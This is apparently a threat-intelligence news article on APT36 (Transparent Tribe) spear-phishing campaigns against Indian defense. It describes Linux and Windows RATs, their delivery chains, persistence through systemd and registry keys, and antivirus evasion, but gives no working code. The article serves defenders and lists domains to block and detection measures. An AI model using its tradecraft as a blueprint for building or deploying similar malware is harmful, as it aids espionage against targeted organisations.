APT36 Escalates Cyber Attacks on Indian Defense with Advanced Linux Malware
APT36, also known as Transparent Tribe, has intensified its cyber-espionage operations against Indian defense and government sectors by deploying sophisticated cross-platform malware, including new tools targeting Linux systems. Recent analyses by Aryaka Threat Research Labs reveal the group’s use of stealthy Remote Access Trojans (RATs) designed for persistent access and data exfiltration.
Spear-Phishing Tactics and Payload Delivery
APT36, along with its affiliate SideCopy, employs spear-phishing campaigns to infiltrate both Windows and Linux environments. These campaigns utilize malicious LNK, HTA, ELF binaries, and PPAM files to deceive recipients into executing harmful payloads. Notably, the attackers have been leveraging trusted Indian domains, such as innlive.in, to host and distribute these malicious files, thereby enhancing the credibility of their phishing attempts.
Advanced Linux Malware Deployment
The group’s recent activities include the deployment of a UPX-packed Go-based ELF downloader. Upon execution, this downloader creates a concealed directory within the user’s home folder and retrieves three critical files from the compromised domain:
– gkt3.1: A PyInstaller-packed Ares RAT ELF binary.
– gkt3.sh: A shell script designed to establish persistence via systemd user services.
– Decoy PDF: A benign document intended to distract the user while the malware operates in the background.
The systemd service ensures that the Ares RAT is automatically executed upon user login, maintaining its presence even after system reboots.
Ares RAT Functionalities
Ares RAT, a Python-based Remote Access Trojan, initiates by collecting system information, including platform details, hostname, username, and a unique identifier. It performs a comprehensive enumeration of the user’s home directory, compiling a list of files which is then exfiltrated to the command-and-control (C2) server.
The RAT operates in a continuous loop, periodically communicating with the C2 server to receive and execute commands such as:
– cd: Change the current working directory.
– upload: Send local files to the C2 server.
– download: Retrieve files from the C2 server.
– listall: Recursively list and exfiltrate files.
– screenshot: Capture and transmit screenshots.
– persist: Establish or reinforce persistence mechanisms.
Parallel Windows Attacks
Simultaneously, APT36 continues to target Windows systems using LNK shortcuts that invoke mshta.exe to fetch JavaScript from compromised sites like sifi.co.in. This leads to XAML deserialization and in-memory .NET deserialization, culminating in the deployment of GETA RAT. This .NET-based RAT utilizes AES-encrypted TCP communication on ports such as 8621, with capabilities including process termination, screenshot capture, shell command execution, and file operations. Persistence is achieved through methods like adding entries to the Startup folder and modifying registry keys, while also implementing checks to evade detection by antivirus solutions like Kaspersky and Quick Heal.
Desk RAT and Additional Windows Exploits
Another tool in APT36’s arsenal is the Go-based Desk RAT, delivered via PPAM lures with titles like Project Vijayak BRO Updates. These lures contain auto-running VBA macros that download ZIP files from domains such as defenceindia.siteteamindia. Desk RAT profiles system resources, establishes persistence through registry run keys, and determines the public IP address using services like ipify.org. It communicates with the C2 server via WebSocket, sending telemetry data and awaiting commands to browse files, upload and execute files, among other functions.
Indicators of Compromise and Defensive Measures
Security researchers have identified several indicators of compromise (IoCs) associated with these campaigns, including specific IP addresses, domain names, and file hashes. Organizations are advised to block domains such as innlive.in and sifi.co.in, monitor for unusual activities involving mshta.exe, systemd services, and WebSocket communications. Implementing DNS and Secure Web Gateway (SWG) solutions can help detect and prevent phishing attempts, while Intrusion Detection and Prevention Systems (IDS/IPS) can identify anomalies related to beaconing and encrypted C2 communications.
Conclusion
APT36’s recent activities underscore a significant escalation in their cyber-espionage capabilities, particularly with the development and deployment of advanced Linux malware. Their strategic use of trusted domains for payload distribution, combined with sophisticated persistence and evasion techniques, poses a substantial threat to Indian defense and government sectors. Continuous vigilance, robust cybersecurity measures, and user education are imperative to mitigate the risks associated with such advanced persistent threats.
